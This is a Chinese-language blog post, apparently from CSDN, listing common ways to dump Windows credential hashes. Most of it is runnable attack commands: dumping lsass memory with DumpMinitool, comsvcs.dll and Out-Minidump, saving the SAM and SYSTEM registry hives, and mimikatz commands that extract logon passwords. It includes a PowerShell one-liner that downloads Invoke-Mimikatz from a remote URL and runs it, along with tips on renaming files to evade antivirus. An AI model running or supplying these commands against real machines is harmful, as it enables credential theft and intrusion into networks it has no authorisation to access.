dump hash常见方法总结

最新推荐文章于 2024-05-01 20:00:00 发布
最新推荐文章于 2024-05-01 20:00:00 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127136474
版权

dump hash 常见方式总结

DumpMinitool dump hash

在这里插入图片描述

dump lsass进程

DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full

--file 保存文件名为1.txt 规避一下杀软
--processId  lsass.exe 进程号

杀软无拦截

查看1.dmp

sekurlsa::minidump "1.dmp"

sekurlsa::logonpasswords

在这里插入图片描述

注册表读取hash

reg save HKLM\SYSTEM C:\windows\temp\Sys.hiv
reg save HKLM\SAM C:\windows\temp\Sam.hiv

privilege::debug
sekurlsa::logonpasswords
# mimikatz运行解密命令
lsadump::sam /sam:Sam.hiv /system:Sys.hiv

mimikatz 读取内存中的密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

procdump lsass.exe进程

可以在任务管理器中对着lsass.exe进程  create dump file  dump下来得文件使用mimikatz解开

mimikatz命令
(使用以下命令针对 lsass.dmp 文件启动 mimikatz alpha:)
privilege::debug

sekurlsa::minidump C:\Users\PunchMan\Desktop\lsass.dmp

sekurlsa::logonPasswords full
or
sekurlsa::logonPasswords

在这里插入图片描述

在这里插入图片描述

使用Powershell远程加载mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

在这里插入图片描述

  • 本地调用Mimikatz读密码
    PowerShell因为在此系统中禁止执行脚本
    用管理员权限打开powershell并执行 set-ExecutionPolicy RemoteSigned即可.

mimikataz 读取转存后得文件

mimikatz命令读取密码
mimikatz.exe privilege::debug 
cd 到转存的文件目录
sekurlsa::logonpasswords full exit

comsvcs.dll 需要管理员权限得powershell

powershell 执行

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

此时我们想到,把这个 comsvcs.dll 复制到其他随意目录并取个新的名字,叫test.dll绕过杀软

在这里插入图片描述

在这里插入图片描述

PowerSploit* 脚本 Out-MiniDump.ps1(截止2022.2.8有效)

使用 PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。工具项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

evilxpl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php操作redis数据库常见方法实例总结
12-20
在PHP中操作Redis数据库是常见的数据缓存和存储方式,尤其在处理高并发和高性能的Web应用时。本文将详细讲解如何使用PHP的`php_redis`扩展来与Redis交互,并提供若干实例,涵盖连接、验证、字符串操作以及哈希操作等...
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8420
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Kali渗透测试:散列密码破解
Liu_Bruce的博客
05-26 4116
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
抓取内网Windows明文密码与hashdump抓取密文
M372109150的博客
05-01 178
msf远程控制实验,首先生成一个木马控制程序--mpf.exe,然后启用MSF攻击平台, 再加载模块和选择payload,并且设置payload参数并且进行监听,提权,hashdump抓取hash值 思考题:windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么? 这两个模块分别都代表什么 为什么第一个模块 永远是一样的aad3 这两个模块的加密算法有什么不同,如何加密的
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
Hash扩展长度攻击及Hashdump的使用
ZXT02的博客
11-22 593
Hash扩展长度攻击、Hashdump的使用和相关CTF题目
AD攻防-域用户HashDump追踪之道
喜欢Python编程的程序员柚柚呀
08-24 854
it,网上dump域用户hash的方式五花八门,少有站在防御者视角对不同的dump方式进行梳理剖析和取证定位的文章,掌握不同dump方式的底层原理才能在EDR对抗时不慌不乱、在应急响应中抓住重点,选择最适合的手段快速达到自己的目的。本文大纲如下:![AAA-
后渗透攻击(三)
hmysn的博客
12-25 2793
在进行提权后我们的操作空间就会大很多,可以进行一系列的创建新账户、获取账号密码、远程操控屏幕等等的操作。该文章就对一些常用的操作进行了整理。
Oracle常用dump命令,记录一下备查。
09-14
Oracle常用dump命令详解 Oracle dump命令是Oracle数据库管理员和开发者在日常工作中经常使用的命令之一。该命令可以帮助用户快速地获取数据库的各种信息,包括Global Area、Library Cache、Row Cache、Buffers、...
php操作redis中的hash和zset类型数据的方法和代码例子
12-19
在PHP中操作Redis数据库,尤其是处理哈希(Hash)和有序集合(ZSet)类型的数据,是常见的需求。这两种数据结构在存储键值对时提供了更丰富的功能,适合存储复杂对象或者具有排序需求的数据。 哈希(Hash)类型在...
php常用函数总结.xls
03-27
本文件“php常用函数总结.xls”显然是一个整理了PHP常用函数的资源,方便开发者查阅和学习。下面我们将深入探讨一些PHP中的关键函数类别及其用途。 1. **字符串处理函数**: - `strlen()`:计算字符串的长度。 - ...
绕过360实现lsass转储
hongduilanjun的博客
04-18 935
前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::logonpasswords [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png
msf抓取hashdump的思考
a15183865601的博客
04-25 1020
1. windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文2. 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么?这两个模块分别都代表什么3. 为什么第一个模块 永远是一样的aad34. 这两个模块的加密算法有什么不同,如何加密的。
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
微软自带签名exe,免杀dump hash
weixin_44747030的博客
04-16 1281
微软签名DumpMinitool.exe,免杀dump hash 微软签名的exe dump lsass进程 DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full --file 保存文件名为1.txt 规避一下杀软 --processId lsass.exe 进程号 杀软无拦截 查看1.dmp sekurlsa::minidump "1.dmp" sekurlsa::logonpasswords 参考文章:https://
绕过查杀工具实现lsass转储
stars的博客
05-01 927
最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为: C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions 接下来测试一下效果,先看一下程序信息 查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。 使用火绒对程序扫描: 使用程
类似于Mimikatz的Linux Hash Dump工具
weixin_33795833的博客
04-04 562
项目主页https://github.com/huntergregal/mimipenguin需要root权限 支持 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Ke...
几种免杀转储lsass进程的技巧
chenfeng857的博客
09-06 3136
在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。 在存在杀软防护的情况下,要想转储lsass进程,我首先想到的是procdump+Mimikatz 的方式
json的dumpdumps方法的区别
最新发布
05-30
在Python中,JSON是一种非常常用的数据交换格式。JSON格式的数据可以通过Python内置的json模块进行处理。其中,json模块提供了两个主要的方法dump()和dumps()。 其中,dump()方法将Python对象转换为JSON格式的字符串,并将其写入文件对象,而dumps()方法则将Python对象转换为JSON格式的字符串。 具体来说,dump()方法的语法如下: ``` json.dump(obj, fp, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw) ``` 其中,obj表示要进行序列化的Python对象,fp表示要写入的文件对象。除此之外,还可以通过其他参数进行一些配置。而dumps()方法的语法如下: ``` json.dumps(obj, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw) ``` 可以看到,dumps()方法dump()方法唯一的区别就在于输出结果的方式不同:一个是写入文件,一个是返回字符串。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值